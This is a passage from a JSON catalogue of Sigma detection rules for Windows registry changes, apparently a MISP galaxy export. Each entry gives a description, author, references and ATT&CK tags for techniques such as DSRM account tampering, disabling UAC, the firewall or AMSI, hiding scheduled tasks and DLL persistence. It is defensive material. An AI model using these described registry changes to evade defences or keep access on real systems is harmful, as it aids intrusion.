"refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", "value": "Displaying Hidden Files Feature Disabled" }, { "description": "Detects changes to \"DsrmAdminLogonBehavior\" registry value.\nDuring a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.\nAttackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"0\", the administrator account can only be used if the DC starts in DSRM.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"1\", the administrator account can only be used if the local AD DS service is stopped.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"2\", the administrator account can always be used.\n", "meta": { "author": "Nischal Khadgi", "creation_date": "2024-07-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_dsrm_tampering.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=1785", "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials", "https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dsrm_tampering.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b61e87c0-50db-4b2e-8986-6a2be94b33b0", "value": "Directory Service Restore Mode(DSRM) Registry Value Tampering" }, { "description": "Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021-06-08", "falsepositive": [ "Unlikely" ], "filename": "registry_set_office_disable_protected_view_features.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5c7a43f-6009-4a8c-80c5-32abf1c53ecc", "value": "Microsoft Office Protected View Disabled" }, { "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", "meta": { "author": "frack113", "creation_date": "2021-12-30", "falsepositive": [ "Unknown" ], "filename": "registry_set_winlogon_notify_key.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml" ], "tags": [ "attack.persistence", "attack.t1547.004" ] }, "related": [ { "dest-uuid": "6836813e-8ec8-4375-b459-abb388cb1a35", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "value": "Winlogon Notify Key Logon Persistence" }, { "description": "Detects changes to the AppInstaller (winget) policy. Specifically the activation of the local manifest installation, which allows a user to install new packages via custom manifests.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-17", "falsepositive": [ "Administrators or developers might enable this for testing purposes or to install custom private packages" ], "filename": "registry_set_winget_enable_local_manifest.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winget_enable_local_manifest.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "fa277e82-9b78-42dd-b05c-05555c7b6015", "value": "Enable Local Manifest Installation With Winget" }, { "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-20", "falsepositive": [ "Unknown" ], "filename": "registry_set_suspicious_env_variables.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://infosec.exchange/@sbousseaden/109542254124022664", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suspicious_env_variables.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence" ] }, "uuid": "966315ef-c5e1-4767-ba25-fce9c8de3660", "value": "Suspicious Environment Variable Has Been Registered" }, { "description": "Detect set EnableFirewall to 0 to disable the Windows firewall", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_windows_firewall.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.004/T1562.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_windows_firewall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "value": "Disable Windows Firewall by Registry" }, { "description": "Detects changes to the default RDP port.\nRemote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_change_rdp_port.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml" ], "tags": [ "attack.persistence", "attack.t1547.010" ] }, "related": [ { "dest-uuid": "43881e51-ac74-445b-b4c6-f9f9e9bf23fe", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "509e84b9-a71a-40e0-834f-05470369bd1e", "value": "Default RDP Port Changed to Non Standard Port" }, { "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", "meta": { "author": "frack113", "creation_date": "2022-11-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", "value": "NET NGenAssemblyUsageLog Registry Key Tamper" }, { "description": "Detects changes to the registry value \"PythonFunctionWarnings\" that would prevent any warnings or alerts from showing when Python functions are about to be executed.\nThreat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), @Kostastsale", "creation_date": "2024-08-23", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_disable_python_security_warnings.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/office/data-security-and-python-in-excel-33cc88a4-4a87-485e-9ff9-f35958278327", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_python_security_warnings.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17e53739-a1fc-4a62-b1b9-87711c2d5e44", "value": "Python Function Execution Security Warning Disabled In Excel - Registry" }, { "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2023-08-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_provisioning_command_abuse.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7021255e-5db3-4946-a8b9-0ba7a4644a69", "value": "Potential Provisioning Registry Key Abuse For Binary Proxy Execution - REG" }, { "description": "Detects when an attacker tries to disable User Account Control (UAC) by setting the registry value \"EnableLUA\" to 0.\n", "meta": { "author": "frack113", "creation_date": "2022-01-05", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_disable.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_disable.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48437c39-9e5f-47fb-af95-3d663c3f2919", "value": "UAC Disabled" }, { "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-21", "falsepositive": [ "This value is not set by default but could be rarly used by administrators" ], "filename": "registry_set_hangs_debugger_persistence.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/", "https://persistence-info.github.io/Data/wer_debugger.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "833ef470-fa01-4631-a79b-6f291c9ac498", "value": "Add Debugger Entry To Hangs Key For Persistence" }, { "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-08", "falsepositive": [ "Unknown" ], "filename": "registry_set_dns_server_level_plugin_dll.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002", "attack.t1112" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e61e8a88-59a9-451c-874e-70fcc9740d67", "value": "New DNS ServerLevelPluginDll Installed" }, { "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", "meta": { "author": "frack113", "creation_date": "2022-03-18", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_set_nopolicies_user.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", "value": "Registry Explorer Policy Modification" }, { "description": "Detects modification of the registry settings used for Internet Explorer and other Windows components that use these settings. An attacker can abuse this registry key to add a domain to the trusted sites Zone or insert javascript for persistence", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_ie.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ie.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d88d0ab2-e696-4d40-a2ed-9790064e66b3", "value": "Modification of IE Registry Settings" }, { "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", "meta": { "author": "frack113", "creation_date": "2022-01-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_defender_firewall.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_defender_firewall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "value": "Disable Microsoft Defender Firewall via Registry" }, { "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", "meta": { "author": "frack113", "creation_date": "2022-02-26", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_enable_dde.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" ], "tags": [ "attack.execution", "attack.t1559.002" ] }, "related": [ { "dest-uuid": "232a7e42-cd6e-4902-8fe9-2960f529dd4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63647769-326d-4dde-a419-b925cc0caf42", "value": "Enable Microsoft Dynamic Data Exchange" }, { "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-05", "falsepositive": [ "Legitimate administrators removing applications (should always be investigated)" ], "filename": "registry_delete_exploit_guard_protected_folders.yml", "level": "high", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", "value": "Folder Removed From Exploit Guard ProtectedFolders List - Registry" }, { "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", "meta": { "author": "Sittikorn S", "creation_date": "2022-04-15", "falsepositive": [ "Unknown" ], "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", "value": "Removal Of SD Value to Hide Schedule Task - Registry" }, { "description": "Detects the deletion of registry keys containing the MSTSC connection history", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-10-19", "falsepositive": [ "Unknown" ], "filename": "registry_delete_mstsc_history_cleared.yml", "level": "high", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", "http://woshub.com/how-to-clear-rdp-connections-history/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070", "attack.t1112" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", "value": "Terminal Server Client Connection History Cleared - Registry" }, { "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "filename": "registry_delete_removal_com_hijacking_registry_key.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/7", "https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", "https://learn.microsoft.com/en-us/windows/win32/shell/launch", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md", "https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "value": "Removal of Potential COM Hijacking Registry Keys" }, { "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.", "meta": { "author": "frack113", "creation_date": "2021-06-07", "falsepositive": [ "Unlikely" ], "filename": "registry_delete_removal_amsi_registry_key.yml", "level": "high", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://seclists.org/fulldisclosure/2020/Mar/45", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", "value": "Removal Of AMSI Provider Registry Keys" }, { "description": "Detects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing \"DisableAIDataAnalysis\" registry value.\nAdversaries may enable Windows Recall as part of post-exploitation discovery and collection activities.\nThis rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.\n", "meta": { "author": "Sajid Nawaz Khan", "creation_date": "2024-06-02", "falsepositive": [ "Legitimate use/activation of Windows Recall" ], "filename": "registry_delete_enable_windows_recall.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis", "https://learn.microsoft.com/en-us/windows/client-management/manage-recall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_enable_windows_recall.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5dfc1465-8f65-4fde-8eb5-6194380c6a62", "value": "Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted" }, { "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-26", "falsepositive": [ "Unknown" ], "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml", "level": "medium", "logsource.category": "registry_delete", "logsource.product": "windows", "refs": [ "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "value": "Removal Of Index Value to Hide Schedule Task - Registry" }, { "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", "meta": { "author": "Mateusz Wydra, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Creation of non-default, legitimate at usage" ], "filename": "registry_event_susp_atbroker_change.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.persistence", "attack.t1547" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9577edbb-851f-4243-8c91-1d5b50c1a39b", "value": "Atbroker Registry Change" }, { "description": "Detects the modification of the PortProxy registry key which is used for port forwarding.", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2021-06-22", "falsepositive": [ "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", "Synergy Software KVM (https://symless.com/synergy)" ], "filename": "registry_event_portproxy_registry_key.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", "https://www.dfirnotes.net/portproxy_detection/", "https://adepts.of0x.cc/netsh-portproxy-code/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" ], "tags": [ "attack.lateral-movement", "attack.defense-evasion", "attack.command-and-control", "attack.t1090" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", "value": "New PortProxy Registry Entry Added" }, { "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", "meta": { "author": "Ilyas Ochkov, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" ], "tags": [ "attack.persistence", "attack.t1546.009" ] }, "related": [ { "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", "value": "New DLL Added to AppCertDlls Registry Key" }, { "description": "Alerts on trust record modification within the registry, indicating usage of macros", "meta": { "author": "Antonlovesdnb, Trent Liffick (@tliffick)", "creation_date": "2020-02-19", "falsepositive": [ "This will alert on legitimate macro usage as well, additional tuning is required" ], "filename": "registry_event_office_trust_record_modification.yml", "level": "medium", "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/", "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html", "https://twitter.com/inversecos/status/1494174785621819397", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "295a59c1-7b79-4b47-a930-df12c15fc9c2", "value": "Windows Registry Trust Record Modification" }, { "description": "Detects static QMS 810 and mimikatz driver name used by 